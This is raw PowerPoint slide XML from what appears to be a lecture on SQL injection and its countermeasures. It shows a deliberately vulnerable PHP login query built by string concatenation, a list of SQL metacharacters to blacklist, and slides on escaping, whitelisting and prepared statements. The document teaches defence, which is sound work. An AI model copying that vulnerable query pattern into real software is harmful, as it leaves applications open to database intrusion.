              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"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		document.write(</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>“world: “</a:t>
            </a:r>
            <a:r>
              <a:t>, a+b, </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>“&lt;/b&gt;”</a:t>
            </a:r>
            <a:r>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="22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	&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2200">
                <a:solidFill>
                  <a:srgbClr val="C84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&lt;/body&gt;&lt;/html&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7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1369" y="6989358"/>
            <a:ext cx="9682062" cy="7729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" grpId="1" animBg="1" advAuto="0"/>
      <p:bldP spid="761" grpId="2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QL injection attacks are common"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="90620" y="444500"/>
            <a:ext cx="1282356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SQL injection attacks are common</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="647" name="2D Column Chart"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1189878" y="2900450"/>
          <a:ext cx="10625044" cy="503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8" name="% of vulnerabilities that are SQL injection"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="884535" y="3685917"/>
            <a:ext cx="4935477" cy="1117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rgbClr val="50A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% of vulnerabilities that</a:t>
            </a:r>
            <a:br/>
            <a:r>
              <a:t>are SQL injection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="649" name="http://web.nvd.nist.gov/view/vuln/statistics"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4555185" y="8271840"/>
            <a:ext cx="389443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t>http://web.nvd.nist.gov/view/vuln/statistics</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1289347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license-sql.jpg" descr="license-sq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846" y="1544772"/>
            <a:ext cx="8847108" cy="66640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91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QL injection countermeasur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SQL injection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2371219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he underlying iss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underlying issue</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="656" name="This one string combines the code and the data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4683105"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:t>This one string combines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code</a:t>
            </a:r>
            <a:r>
              <a:t> and the </a:t>
            </a:r>
            <a:r>
              <a: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rPr>
              <a:t>data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:t>Similar to buffer overflows</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="657" name="$result = mysql_query(“select * from Users…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1886793" y="2705004"/>
            <a:ext cx="8665332" cy="7620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where(name=‘$user’ and password=‘$pass’);”);</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="658" name="When the boundary between code and data blurs,…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1299753" y="6730600"/>
            <a:ext cx="1040529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When the boundary between code and data blurs,</a:t>
            </a:r>
          </a:p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we open ourselves up to vulnerabilities</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="659" name="Oval" descr="Oval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7995" y="4130662"/>
            <a:ext cx="4480429" cy="906745"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="661" name="Line" descr="Li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8818832" y="3869688"/>
            <a:ext cx="670691" cy="63501"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="663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2355230">
            <a:off x="5590180" y="3948562"/>
            <a:ext cx="1824441" cy="63501"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="665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63065" y="3502593"/>
            <a:ext cx="861394" cy="63501"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="667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57448" y="3502593"/>
            <a:ext cx="861394" cy="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277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build="p" bldLvl="5" animBg="1" advAuto="0"/>
      <p:bldP spid="658" grpId="0" animBg="1" advAuto="0"/>
      <p:bldP spid="659" grpId="0" animBg="1" advAuto="0"/>
      <p:bldP spid="661" grpId="0" animBg="1" advAuto="0"/>
      <p:bldP spid="663" grpId="0" animBg="1" advAuto="0"/>
      <p:bldP spid="665" grpId="0" animBg="1" advAuto="0"/>
      <p:bldP spid="667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Line"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="8975466" y="6425163"/>
            <a:ext cx="779875" cy="102087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1" name="Line"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="7898389" y="6617434"/>
            <a:ext cx="689424" cy="100984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2" name="Line"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7397554" y="5490077"/>
            <a:ext cx="1442983" cy="101701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3" name="Line"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="5781134" y="6617434"/>
            <a:ext cx="911066" cy="100984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4" name="Line"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="4809912" y="6608180"/>
            <a:ext cx="1019100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5" name="Line"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="5805146" y="5493978"/>
            <a:ext cx="1120931" cy="950629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6" name="Line"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="6189384" y="4301697"/>
            <a:ext cx="1019101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7" name="Line"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="4801613" y="4468754"/>
            <a:ext cx="252298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8" name="Line"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="3295779" y="4468754"/>
            <a:ext cx="1019100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79" name="The underlying iss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underlying issue</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="680" name="$result = mysql_query(“select * from Users…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1886793" y="2705004"/>
            <a:ext cx="8665332" cy="7620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$result = mysql_query(“select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where(name=‘$user’ and password=‘$pass’);”);</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="681" name="select / from / where"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3155944" y="4019329"/>
            <a:ext cx="3831003" cy="654349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select / from / where</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="682" name="*"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3117640" y="5051830"/>
            <a:ext cx="925868" cy="654350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*</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="683" name="Users"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4262435" y="5051830"/>
            <a:ext cx="1330653" cy="654350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Users</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="684" name="and"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6575518" y="5051830"/>
            <a:ext cx="1330653" cy="654350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and</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="685" name="="/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5454931" y="6084332"/>
            <a:ext cx="660824" cy="654349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=</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="686" name="name"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4505010" y="7116833"/>
            <a:ext cx="1132871" cy="654349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name</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="687" name="$user"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5941959" y="7116833"/>
            <a:ext cx="1239540" cy="654349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$user</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="688" name="="/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8483491" y="6084332"/>
            <a:ext cx="660824" cy="654349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=</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="689" name="password"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7443623" y="7104614"/>
            <a:ext cx="1598956" cy="654349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password</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="690" name="$pass"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9113615" y="7104614"/>
            <a:ext cx="1239540" cy="654349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$pass</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="691" name="$user"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5941959" y="7116833"/>
            <a:ext cx="1239540" cy="654349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01600">
            <a:solidFill>
              <a:schemeClr val="accent5"/>
            </a:solidFill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$user</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="692" name="Should be data, not code"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9421203" y="4224301"/>
            <a:ext cx="2363324" cy="1173891"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 35452"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent5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 algn="l">
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>Should be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data</a:t>
            </a:r>
            <a:r>
              <a:t>, not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4026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" grpId="0" animBg="1" advAuto="0"/>
      <p:bldP spid="692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revention: Input valid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Prevention</a:t>
            </a:r>
            <a:r>
              <a:t>: Input validation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="697" name="We require input of a certain form, but we cannot guarantee it has that form, so we must validate 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require input of a certain form, but we cannot guarantee it has that form, so we must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validate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it</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:t>Just like we do to avoid buffer overflows</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:t>Making input trustworthy</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/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Check </a:t>
            </a:r>
            <a:r>
              <a:t>it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has the expected form, reject it if not</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/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Sanitize </a:t>
            </a:r>
            <a:r>
              <a:t>by modifying it or using it such that the result is correctly formed</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="67589900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" grpId="0" build="p" bldLvl="5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anitization: Blacklis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2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Sanitization</a:t>
            </a:r>
            <a:r>
              <a:t>: Blacklisting</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="700" name="Delete the characters you don’t wa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Delete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the characters you don’t want</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="419805" indent="-419805">
              <a:defRPr sz="3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Downside</a:t>
            </a:r>
            <a:r>
              <a:t>: “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Lupita Nyong’o</a:t>
            </a:r>
            <a:r>
              <a:t>”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="864305" lvl="1" indent="-419805">
              <a:defRPr sz="3400"/>
            </a:pPr>
            <a:r>
              <a:t>You want these characters sometimes!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="864305" lvl="1" indent="-419805">
              <a:defRPr sz="3400"/>
            </a:pPr>
            <a:r>
              <a:t>How do you know if/when the characters are bad?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="419805" indent="-419805">
              <a:spcBef>
                <a:spcPts val="1500"/>
              </a:spcBef>
              <a:defRPr sz="3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Downside</a:t>
            </a:r>
            <a:r>
              <a:t>: How to know you’ve ID’d all bad chars?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="701" name="’"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5523556" y="2900194"/>
            <a:ext cx="74429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algn="l">
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:defRPr sz="28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’ </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="702" name="--"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6736953" y="2900194"/>
            <a:ext cx="74429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algn="l">
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:defRPr sz="28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--</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="703" name=";"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6117487" y="2900194"/>
            <a:ext cx="53089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algn="l">
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:defRPr sz="28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497732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0" build="p" bldLvl="5" animBg="1" advAuto="0"/>
      <p:bldP spid="701" grpId="0" animBg="1" advAuto="0"/>
      <p:bldP spid="702" grpId="0" animBg="1" advAuto="0"/>
      <p:bldP spid="703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anitization: Escap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2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Sanitization</a:t>
            </a:r>
            <a:r>
              <a:t>: Escaping</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="706" name="Replace problematic characters with safe on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3200"/>
              </a:spcBef>
              <a:defRPr sz="2772" b="1">
                <a:latin typeface="Helvetica"/>
                <a:ea typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>Replace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problematic characters with safe ones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Change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’</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:t>to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\’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Change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;</a:t>
            </a:r>
            <a:r>
              <a:t> to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\;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Change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-</a:t>
            </a:r>
            <a:r>
              <a:t> to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\-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Change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\</a:t>
            </a:r>
            <a:r>
              <a:t> to </a:t>
            </a:r>
            <a:r>
              <a:rPr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\\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t>Hard by hand, there are many libs &amp; methods</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="684529" lvl="1" indent="-342264" defTabSz="449833">
              <a:spcBef>
                <a:spcPts val="1100"/>
              </a:spcBef>
              <a:defRPr sz="2772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magic_quotes_gpc = On</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="684529" lvl="1" indent="-342264" defTabSz="449833">
              <a:spcBef>
                <a:spcPts val="1100"/>
              </a:spcBef>
              <a:defRPr sz="2772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mysql_real_escape_string()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342264" indent="-342264" defTabSz="449833">
              <a:spcBef>
                <a:spcPts val="3200"/>
              </a:spcBef>
              <a:defRPr sz="2772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Downside</a:t>
            </a:r>
            <a:r>
              <a:t>: Sometimes you want these in your SQL!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="684529" lvl="1" indent="-342264" defTabSz="449833">
              <a:spcBef>
                <a:spcPts val="1100"/>
              </a:spcBef>
              <a:defRPr sz="2772"/>
            </a:pPr>
            <a:r>
              <a:t>And escaping still may not be enough</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="417612473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" grpId="0" build="p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hecking: Whitelis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accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Checking</a:t>
            </a:r>
            <a:r>
              <a:t>: Whitelisting</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="711" name="Check that the user input is known to be saf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455"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Check that the user input is </a:t>
            </a:r>
            <a:r>
              <a:t>known to be safe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="853439" lvl="1" indent="-426719" defTabSz="560831">
              <a:spcBef>
                <a:spcPts val="1400"/>
              </a:spcBef>
              <a:defRPr sz="3455"/>
            </a:pPr>
            <a:r>
              <a:t>E.g., integer within the right range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t>Rationale: Given invalid input,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safer to reject than fix</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="853439" lvl="1" indent="-426719" defTabSz="560831">
              <a:spcBef>
                <a:spcPts val="1400"/>
              </a:spcBef>
              <a:defRPr sz="3455"/>
            </a:pPr>
            <a:r>
              <a:t>“Fixes” may result in wrong output, or vulnerabilities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="853439" lvl="1" indent="-426719" defTabSz="560831">
              <a:spcBef>
                <a:spcPts val="1400"/>
              </a:spcBef>
              <a:defRPr sz="3455"/>
            </a:pPr>
            <a:r>
              <a:t>Principle of fail-safe defaults</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="426719" indent="-426719" defTabSz="560831">
              <a:spcBef>
                <a:spcPts val="4000"/>
              </a:spcBef>
              <a:defRPr sz="3455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Downside</a:t>
            </a:r>
            <a:r>
              <a:t>: Hard for rich input!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="853439" lvl="1" indent="-426719" defTabSz="560831">
              <a:spcBef>
                <a:spcPts val="1400"/>
              </a:spcBef>
              <a:defRPr sz="3455"/>
            </a:pPr>
            <a:r>
              <a:t>How to whitelist usernames? First names?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="40000141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" grpId="0" build="p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Can we do better?"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1270000" y="6362700"/>
            <a:ext cx="10464800" cy="62230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Can we do better?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="714" name="Sanitization via escaping, whitelisting, blacklisting is HARD."/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="14"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1270000" y="3873500"/>
            <a:ext cx="10464800" cy="1473201"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr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t>Sanitization via escaping, whitelisting, blacklisting is HARD.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="202250184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Javascrip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Javascript</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="764" name="Powerful web page programming langu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Powerful web page </a:t>
            </a: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programming language</a:t>
            </a:r>
            <a:endParaRPr b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1333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 smtClean="0"/>
              <a:t>Scripts </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>embedded in pages returned by the web server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="391159" indent="-391159" defTabSz="514095">
              <a:spcBef>
                <a:spcPts val="3600"/>
              </a:spcBef>
              <a:defRPr sz="3168"/>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>Scripts are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executed by the browser</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>.  They can: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Alter page contents</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0">
                <a:solidFill>
                  <a:srgbClr val="020000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(DOM objects)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Track events</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t> (mouse clicks, motion, keystrokes)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Issue web requests</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t> &amp; read replies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Maintain persistent connections</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t> (AJAX)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="782319" lvl="1" indent="-391159" defTabSz="514095">
              <a:spcBef>
                <a:spcPts val="1300"/>
              </a:spcBef>
              <a:defRPr sz="3168"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1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Read and set cookies</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="767" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="9565823" y="541754"/>
            <a:ext cx="2401713" cy="1158967"/>
            <a:chOff x="-278674" y="-131937"/>
            <a:chExt cx="2401712" cy="1158965"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="765" name="no relation to Java"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-172934" y="-111125"/>
              <a:ext cx="2295973" cy="111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>
                <a:defRPr sz="34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no relation</a:t>
              </a:r>
              <a:br/>
              <a:r>
                <a:t>to Java</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="769" name="Connection Line"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-278675" y="-131938"/>
              <a:ext cx="177808" cy="115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24" h="21600" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="16224" y="21600"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="-4580" y="14311"/>
                    <a:pt x="-5376" y="7111"/>
                    <a:pt x="13836" y="0"/>
                  </a:cubicBezTo>
                </a:path>
              </a:pathLst>
            </a:cu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endParaRPr/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="770" name="Connection Line"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11923686" y="552040"/>
            <a:ext cx="177808" cy="1158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24" h="21600" extrusionOk="0">
                <a:moveTo>
                  <a:pt x="0" y="21600"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="20804" y="14311"/>
                  <a:pt x="21600" y="7111"/>
                  <a:pt x="2388" y="0"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="25400">
            <a:solidFill>
              <a:schemeClr val="accent5"/>
            </a:solidFill>
            <a:miter lim="400000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1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anitization: Prepared statements"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="192743" y="444500"/>
            <a:ext cx="12647890" cy="2159000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr sz="6500"/>
            </a:pPr>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Sanitization</a:t>
            </a:r>
            <a:r>
              <a:t>: Prepared statements</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="717" name="Treat user data according to its type…"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="952500" y="2393745"/>
            <a:ext cx="11099800" cy="13631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40055" indent="-440055" defTabSz="578358">
              <a:spcBef>
                <a:spcPts val="4100"/>
              </a:spcBef>
              <a:defRPr sz="3564">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>Treat user data according to its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type</a:t>
